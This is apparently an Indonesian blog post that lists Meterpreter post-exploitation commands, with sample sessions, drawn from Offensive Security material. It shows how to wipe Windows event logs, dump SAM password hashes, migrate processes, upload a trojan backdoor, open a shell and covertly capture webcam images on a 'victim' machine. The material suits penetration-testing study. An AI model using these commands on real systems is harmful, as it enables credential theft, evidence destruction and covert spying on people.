Daftar Command Di Meterpreter

 

help

Perintah ‘help’, yang mungkin diperlukan, untuk menampilkan menu bantuan meterpreter.

meterpreter > help

Core Commands
=============

Command Description
——- ———–
? Help menu
background Backgrounds the current session
channel Displays information about active channels
…snip…

 

background

Perintah ‘ background ‘ mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

 

cat

Perintah ‘ cat ‘ digunakan untuk membaca sebuah file.

meterpreter > cat namafile.txt

 

cd & pwd

Perintag cd’ & perintah pwd’ digunakan untuk mengubah dan menampilkan saat bekerja langsung pada host target.
Perubahan direktori cd” bekerja dengan cara yang sama seperti halnya di bawah DOS dan Unix sistem.
Secara default, folder bekerja saat ini adalah di mana sambungan ke Listener Anda dimulai.
ARGUMEN:

cd: Path of the folder to change to
pwd: None required

Contoh penggunaan:

meterpreter > pwd
c:
meterpreter > cd c:windows
meterpreter > pwd
c:windows
meterpreter >

 

clearev

Perintah clearev’ akan menghapus aplikasi, Sistem dan log Keamanan pada sistem Window. 
 

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter > 

 

download

Perintah ‘ download ‘ adalah untuk mendownload file dari komputer victim, dan gunakan double-slashes ( \ )untuk menetapkan direktori.

meterpreter > download c:\boot.ini
[*] downloading: c:boot.ini -> c:boot.ini
[*] downloaded : c:boot.ini -> c:boot.ini/boot.ini
meterpreter >

 

edit

Perintah ‘editmembuka file yang terletak pada host target.
Ia menggunakan vim’ sehingga semua perintah editor tersedia.
meterpreter > ls

Listing: C:Documents and SettingsAdministratorDesktop
========================================================

Mode Size Type Last modified Name
—- —- —- ————- —-
.
…snip…
.
100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt

meterpreter > edit edit.txt

 

excute

Perintah ‘ execute ‘ adalah untuk menjalankan aplikasi para komputer victim.

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

 

getuid

Perintah ‘ getuid ‘ adalah untuk menampilkan hostname dari komputer victim.

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

 

hashdump

The hashdumpmodul posting yang akan membuang isi database SAM.

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hashes…

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

idletime

Perintah ‘ idletime ‘ adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

ipconfig

ipconfig’ perintah ini berfungsi menampilkan interface jaringan dan alamat pada mesin victim.

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0

meterpreter >

 

ls

Seperti di Linux, perintah ls’ akan menampilkan daftar file dalam direktori pada mesin victim saat ini.
meterpreter > ls

Listing: C:Documents and Settingsvictim
=========================================

Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
…snip…

 

migrate

Perintah ‘ migrate ‘ digunakan untuk berpindah pada proses yang lain.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe…
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

 

shell

Perintah ‘ shell ‘ adalah perintah untuk mendapatkan shell dari komputer victim(biasanya command Prompt Untuk Windows).

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

upload

Perintah ‘ upload ‘ adalah untuk mengupload file kedalam komputer victim(biasanya backdoor), dan gunakan double-slashes.

meterpreter > upload evil_trojan.exe c:\windows\system32
[*] uploading  : evil_trojan.exe -> c:windowssystem32
[*] uploaded   : evil_trojan.exe -> c:windowssystem32evil_trojan.exe
meterpreter >

 

webcam_list

Perintah webcam_list‘  dijalankan dari shell meterpreter, akan menampilkan web cam yang tersedia pada host target.

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

 

webcam_snap

Perintah webcam_snap” adalah untuk mengambil gambar dari web cam terhubung pada sistem target, dan menyimpannya ke disk sebagai gambar JPEG. Secara default, menyimpan lokasi direktori yang aktif dengan nama file acak.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

-h Help Banner
-i The index of the webcam to use (Default: 1)
-p The JPEG image path (Default: ‘gnFjTnzi.jpeg’)
-q The JPEG image quality (Default: ’50’)
-v Automatically view the JPEG image (Default: ‘true’)

meterpreter >

Option:

-h: Menampilkan informasi bantuan untuk perintah
-i opt: Jika lebih dari 1 web cam terhubung, gunakan opsi ini untuk memilih perangkat untuk men-capture gambar
p opt: Ganti path dan nama file gambar yang akan disimpan
q opt: kualitas gambar, 50(default) / pengaturan media, 100 kualitas terbaik
v opt: Secara default value-nya true, yang akan membuka gambar setelah penangkapan.

Source: http://www.offensive-security.com

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s